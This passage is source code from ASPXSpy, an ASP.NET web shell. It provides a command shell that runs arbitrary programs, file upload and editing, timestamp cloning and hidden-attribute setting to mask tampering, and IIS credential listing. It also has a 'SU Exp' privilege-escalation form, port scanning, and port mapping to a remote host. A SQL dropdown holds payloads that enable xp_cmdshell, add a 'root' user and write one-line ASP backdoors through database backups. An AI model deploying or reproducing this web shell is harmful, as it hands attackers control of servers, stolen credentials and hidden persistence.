1946. if(Ven.SelectedItem.Value=="name")
1947. {
1948. if(rAQ.Checked)
1949. {
1950. if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
1951. {
1952. FJvQ(Bin_Files);
1953. }
1954. }
1955. else
1956. {
1957. if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
1958. {
1959. Response.Write(Bin_Files.FullName);
1960. FJvQ(Bin_Files);
1961. }
1962. }
1963. }
1964. else
1965. {
1966. StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
1967. string ava=sr.ReadToEnd();
1968. sr.Close();
1969. if(rAQ.Checked)
1970. {
1971. if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
1972. {
1973. FJvQ(Bin_Files);
1974. if(YZw.Checked)
1975. {
1976. ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
1977. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
1978. sw.Write(ava);
1979. sw.Close();
1980. }
1981. }
1982. }
1983. else
1984. {
1985. if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
1986. {
1987. FJvQ(Bin_Files);
1988. if(YZw.Checked)
1989. {
1990. ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
1991. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
1992. sw.Write(ava);
1993. sw.Close();
1994. }
1995. }
1996. }
1997. }
1998. }
1999. catch(Exception ex)
2000. {
2001. xseuB(ex.Message);
2002. continue;
2003. }
2004. }
2005. foreach(DirectoryInfo subdir in dir.GetDirectories())
2006. {
2007. oog(subdir);
2008. }
2009. }
2010. catch(Exception ex)
2011. {
2012. xseuB(ex.Message);
2013. }
2014. }
2015. public void FJvQ(FileInfo objfile)
2016. {
2017. TableRow tr=new TableRow();
2018. TableCell tc=new TableCell();
2019. string bg=OKM();
2020. tr.Attributes["onmouseover"]="this.className='focus';";
2021. tr.CssClass=bg;
2022. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
2023. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
2024. tr.Cells.Add(tc);
2025. tc=new TableCell();
2026. tc.Text=objfile.LastWriteTime.ToString();
2027. tr.Cells.Add(tc);
2028. tc=new TableCell();
2029. tc.Text=mTG(objfile.Length);
2030. tr.Cells.Add(tc);
2031. oJiym.Rows.Add(tr);
2032. }
2033. public void xseuB(string instr)
2034. {
2035. jDKt.Visible=true;
2036. jDKt.InnerText=instr;
2037. }
2038. protected void xVm(object sender,EventArgs e)
2039. {
2040. string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
2041. if(Jfm==Password)
2042. {
2043. Response.Cookies.Add(new HttpCookie(vbhLn,Password));
2044. ljtzC.Visible=false;
2045. PBZw();
2046. }
2047. else
2048. {
2049. tZSx();
2050. }
2051. }
2052. protected void Ybg(object sender,EventArgs e)
2053. {
2054. krIR(Server.MapPath("."));
2055. }
2056. protected void KjPi(object sender,EventArgs e)
2057. {
2058. Bin_H2_Title.InnerText="IIS Spy >>";
2059. WICxe();
2060. VNR.Visible=true;
2061. AdCx();
2062. }
2063. protected void DGCoW(object sender,EventArgs e)
2064. {
2065. try
2066. {
2067. StreamWriter sw;
2068. if(NdCX.SelectedItem.Text=="UTF-8")
2069. {
2070. sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
2071. }
2072. else
2073. {
2074. sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
2075. }
2076. sw.Write(Xgvv.InnerText);
2077. sw.Close();
2078. xseuB("Save file success !");
2079. }
2080. catch(Exception error)
2081. {
2082. xseuB(error.Message);
2083. }
2084. krIR(AXSbb.Value);
2085. }
2086. protected void lbjLD(object sender,EventArgs e)
2087. {
2088. string FlwA=AXSbb.Value;
2089. FlwA=OElM(FlwA);
2090. try
2091. {
2092. Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
2093. xseuB("File upload success!");
2094. }
2095. catch(Exception error)
2096. {
2097. xseuB(error.Message);
2098. }
2099. krIR(AXSbb.Value);
2100. }
2101. protected void EXV(object sender,EventArgs e)
2102. {
2103. krIR(AXSbb.Value);
2104. }
2105. protected void mcCY(object sender,EventArgs e)
2106. {
2107. krIR(Server.MapPath("."));
2108. }
2109. protected void iVk(object sender,CommandEventArgs e)
2110. {
2111. krIR(e.CommandArgument.ToString());
2112. }
2113. protected void XXrLw(object sender,EventArgs e)
2114. {
2115. try
2116. {
2117. File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
2118. File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
2119. File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
2120. xseuB("File time clone success!");
2121. }
2122. catch(Exception error)
2123. {
2124. xseuB(error.Message);
2125. }
2126. krIR(AXSbb.Value);
2127. }
2128. protected void tIykC(object sender,EventArgs e)
2129. {
2130. string path=pWVL.Value;
2131. try
2132. {
2133. File.SetAttributes(path,FileAttributes.Normal);
2134. if(ZhWSK.Checked)
2135. {
2136. File.SetAttributes(path,FileAttributes.ReadOnly);
2137. }
2138. if(SsR.Checked)
2139. {
2140. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
2141. }
2142. if(ccB.Checked)
2143. {
2144. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
2145. }
2146. if(fbyZ.Checked)
2147. {
2148. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
2149. }
2150. File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
2151. File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
2152. File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
2153. xseuB("File attributes modify success!");
2154. }
2155. catch(Exception error)
2156. {
2157. xseuB(error.Message);
2158. }
2159. krIR(AXSbb.Value);
2160. }
2161. protected void VOxn(object sender,EventArgs e)
2162. {
2163. WICxe();
2164. vIac.Visible=true;
2165. Bin_H2_Title.InnerText="Execute Command >>";
2166. }
2167. protected void FbhN(object sender,EventArgs e)
2168. {
2169. try
2170. {
2171. Process ahAE=new Process();
2172. ahAE.StartInfo.FileName=kusi.Value;
2173. ahAE.StartInfo.Arguments=bkcm.Value;
2174. ahAE.StartInfo.UseShellExecute=false;
2175. ahAE.StartInfo.RedirectStandardInput=true;
2176. ahAE.StartInfo.RedirectStandardOutput=true;
2177. ahAE.StartInfo.RedirectStandardError=true;
2178. ahAE.Start();
2179. string Uoc=ahAE.StandardOutput.ReadToEnd();
2180. Uoc=Uoc.Replace("<","&lt;");
2181. Uoc=Uoc.Replace(">","&gt;");
2182. Uoc=Uoc.Replace("\r\n","<br>");
2183. tnQRF.Visible=true;
2184. tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
2185. }
2186. catch(Exception error)
2187. {
2188. xseuB(error.Message);
2189. }
2190. }
2191. protected void RAFL(object sender,EventArgs e)
2192. {
2193. if(qPdI.Text.Length>0)
2194. {
2195. tpRQ(qPdI.Text);
2196. }
2197. else
2198. {
2199. lFAvw();
2200. }
2201. }
2202. protected void Grxk(object sender,EventArgs e)
2203. {
2204. YUw();
2205. }
2206. protected void ilC(object sender,EventArgs e)
2207. {
2208. tZRH();
2209. }
2210. protected void HtB(object sender,EventArgs e)
2211. {
2212. pDVM();
2213. }
2214. protected void Olm(object sender,EventArgs e)
2215. {
2216. iLVUT();
2217. }
2218. protected void jXhS(object sender,EventArgs e)
2219. {
2220. ADCpk();
2221. }
2222. protected void lRfRj(object sender,EventArgs e)
2223. {
2224. lDODR();
2225. }
2226. protected void xSy(object sender,EventArgs e)
2227. {
2228. xFhz();
2229. }
2230. protected void dMx(object sender,EventArgs e)
2231. {
2232. rAhe();
2233. }
2234. protected void zOVO(object sender,EventArgs e)
2235. {
2236. if(((DropDownList)sender).ID.ToString()=="WYmo")
2237. {
2238. dQIIF.Visible=false;
2239. MasR.Text=WYmo.SelectedItem.Value.ToString();
2240. }
2241. if(((DropDownList)sender).ID.ToString()=="Pvf")
2242. {
2243. xTZY();
2244. }
2245. if(((DropDownList)sender).ID.ToString()=="FGEy")
2246. {
2247. jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
2248. }
2249. if(((DropDownList)sender).ID.ToString()=="NdCX")
2250. {
2251. gLKc(Sqon.Value);
2252. }
2253. }
2254. protected void IkkO(object sender,EventArgs e)
2255. {
2256. krIR(AXSbb.Value);
2257. }
2258. protected void BGY(object sender,EventArgs e)
2259. {
2260. vCf();
2261. }
2262. protected void cptS(object sender,EventArgs e)
2263. {
2264. vNCHZ();
2265. }
2266. protected void fDO(object sender,EventArgs e)
2267. {
2268. MHLv();
2269. }
2270. protected void vJNsE(object sender,EventArgs e)
2271. {
2272. vuou();
2273. xseuB("Clear All Thread ......");
2274. }
2275. protected void wDZ(object sender,EventArgs e)
2276. {
2277. if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
2278. ruQO();
2279. xseuB("All Thread Start ......");
2280. }
2281. protected void tYoZ(object sender,EventArgs e)
2282. {
2283. }
2284. protected void ELkQ(object sender,EventArgs e)
2285. {
2286. VikG();
2287. GBYT.Visible=true;
2288. string res=string.Empty;
2289. foreach(ScanPort th in IVc)
2290. {
2291. res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
2292. }
2293. GBYT.InnerHtml=res;
2294. }
2295. protected void ORUgV(object sender,EventArgs e)
2296. {
2297. dwgT();
2298. }
2299. public void WICxe()
2300. {
2301. DCbS.Visible=false;
2302. CzfO.Visible=false;
2303. APl.Visible=false;
2304. vIac.Visible=false;
2305. kkHN.Visible=false;
2306. YwLB.Visible=false;
2307. iDgmL.Visible=false;
2308. hOWTm.Visible=false;
2309. vrFA.Visible=false;
2310. yhv.Visible=false;
2311. }
2312. </script>
2313. <html xmlns="http://www.w3.org/1999/xhtml" >
2314. <head id="Head1" runat="server">
2315. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
2316. <title>ASPXspy</title>
2317. <style type="text/css">
2318. .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
2319. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
2320. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
2321. .list{font:12px Arial,Tahoma;height:23px;}
2322. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
2323. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
2324. a {color: #00f;text-decoration:underline;}
2325. a:hover{color: #f00;text-decoration:none;}
2326. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
2327. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
2328. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
2329. .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
2330. .head td span{font-weight:normal;}
2331. form{margin:0;padding:0;}
2332. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
2333. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
2334. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
2335. .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
2336. .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
2337. </style>
2338. <script type="text/javascript">
2339. function CheckAll(form){
2340. for(var i=0;i<form.elements.length;i++){
2341. var e=form.elements[i];
2342. if(e.name!='chkall')
2343. e.checked=form.chkall.checked;
2344. }
2345. }
2346. </script>
2347. </head>
2348. <body style="margin:0;table-layout:fixed;">
2349. <form id="ASPXSpy" runat="server">
2350. <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
2351. <span style="font:11px Verdana;">Password:</span>
2352. <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
2353. <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
2354. Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>
2355. </div>
2356. <div id="ZVS" runat="server">
2357. <div id="Zzj" runat="server">
2358. <table width="100%" border="0" cellpadding="0" cellspacing="0">
2359. <tr class="head">
2360. <td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
2361. </tr>
2362. <tr class="alt1">
2363. <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
2364. <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
2365. </td>
2366. </tr>
2367. </table>
2368. </div>
2369. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
2370. <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
2371. <h2 id="Bin_H2_Title" runat="server"></h2>
2372. <%--FileList--%>
2373. <div id="CzfO" runat="server">
2374. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
2375.  <tr>
2376. <td style=" white-space:nowrap">Current Directory : </td>
2377. <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
2378. </td>
2379. <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
2380.  </tr>
2381. </table>
2382. <table width="100%" border="0" cellpadding="4" cellspacing="0">
2383. <tr class="alt1"><td colspan="7" style="padding:5px;">
2384. <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
2385. <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
2386.  | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
2387. </td></tr>
2388. <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
2389. <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
2390. </asp:Table>
2391. </table>
2392. </div>
2393. <%--FileEdit--%>
2394. <div id="vrFA" runat="server">
2395. <p>Current File(import new file name and new file)<br/>
2396. <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
2397. </p>
2398. <p>File Content<br/>
2399. <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
2400. </p>
2401. <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
2402. </div>
2403. <%--CloneTime--%>
2404. <div id="zRyG" runat="server" enableviewstate="false" visible="false">
2405. <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
2406. <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
2407. <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
2408. <h2>Set last modified &raquo;</h2>
2409. <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
2410. <p>
2411. <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
2412. &nbsp;
2413. <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
2414. &nbsp;
2415. <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
2416. &nbsp;
2417. <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
2418. </p>
2419. <p>
2420. CreationTime :
2421. <input class="input" id="yUqx" type="text" runat="server"/>
2422. LastWriteTime :
2423. <input class="input" id="uYjw" type="text" runat="server"/>
2424. LastAccessTime :
2425. <input class="input" id="aLsn" type="text" runat="server"/>
2426. </p>
2427. <p>
2428. <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
2429. </p>
2430. </div>
2431. <%--IISSpy--%>
2432. <div runat="server" id="VNR" visible="false" enableviewstate="false">
2433. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2434. <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
2435. <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
2436. </asp:Table>
2437. </table>
2438. </div>
2439. <%--Process--%>
2440. <div runat="server" id="DCbS" visible="false" enableviewstate="false">
2441. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2442. <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
2443. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
2444. </asp:Table>
2445. </table>
2446. </div>
2447. <%--CmdShell--%>
2448. <div runat="server" id="vIac">
2449.  <p>CmdPath:<br/>
2450.  <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
2451.  </p>
2452.  Argument:<br/>
2453.  <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
2454.  <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
2455.  </div>
2456. </div>
2457. <%--Services--%>
2458. <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
2459. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2460. <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
2461. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
2462. </asp:Table>
2463. </table>
2464. </div>
2465. <%--Sysinfo--%>
2466. <div runat="server" id="ghaB" visible="false" enableviewstate="false">
2467. <hr style=" border: 1px solid #ddd;height:0px;"/>
2468. <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
2469. <h2 id="Bin_H2_Mac" runat="server"></h2>
2470. <hr style=" border: 1px solid #ddd;height:0px;"/>
2471. <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
2472. <h2 id="Bin_H2_Driver" runat="server"></h2>
2473. <hr style=" border: 1px solid #ddd;height:0px;"/>
2474. <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
2475. </div>
2476. <%--UserInfo--%>
2477. <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
2478. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2479. <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
2480. </asp:Table>
2481. </table>
2482. </div>
2483. <%--SuExp--%>
2484.  <div runat="server" id="APl">
2485. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2486.  <tr align="center">
2487.  <td style="width:10%"></td>
2488.  <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
2489.  <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
2490.  <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
2491.  <td style="width:10%"></td>
2492.  </tr>
2493.  <tr >
2494.  <td style="width:10%"></td>
2495.  <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
2496.  </tr>
2497. </table>
2498. <div id="UHlA" visible="false" enableviewstate="false" runat="server">
2499. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2500. <tr align="center">
2501. <td style="width:30%"></td>
2502. <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
2503. <td style="width:30%"></td>
2504. </tr>
2505. </table>
2506. </div>
2507. </div>
2508. <%--Reg--%>
2509. <div id="kkHN" runat="server">
2510. <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
2511. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
2512. <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
2513. <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
2514. <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
2515. </asp:Table>
2516. </table>
2517. </div>
2518. <%--PortScan--%>
2519. <div id="YwLB" runat="server">
2520. <p>
2521. IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
2522. </p>
2523. <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
2524. </div>
2525. <%--DataBase--%>
2526. <div id="iDgmL" runat="server">
2527. <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
2528. <div id="dQIIF" runat="server">
2529. <div id="irTU" runat="server"></div>
2530. <div id="uXevN" runat="server">
2531. Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
2532. SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
2533. </div>
2534. <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
2535. <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
2536. <div style="overflow-x:auto;width:950px" >
2537. <p>
2538. <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
2539. </p>
2540. </div>
2541. </div>
2542. </div>
2543. <%--PortMap--%>
2544. <div id="hOWTm" runat="server">
2545. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2546. <tr align="center">
2547. <td style="width:5%"></td>
2548. <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
2549. <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
2550. <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
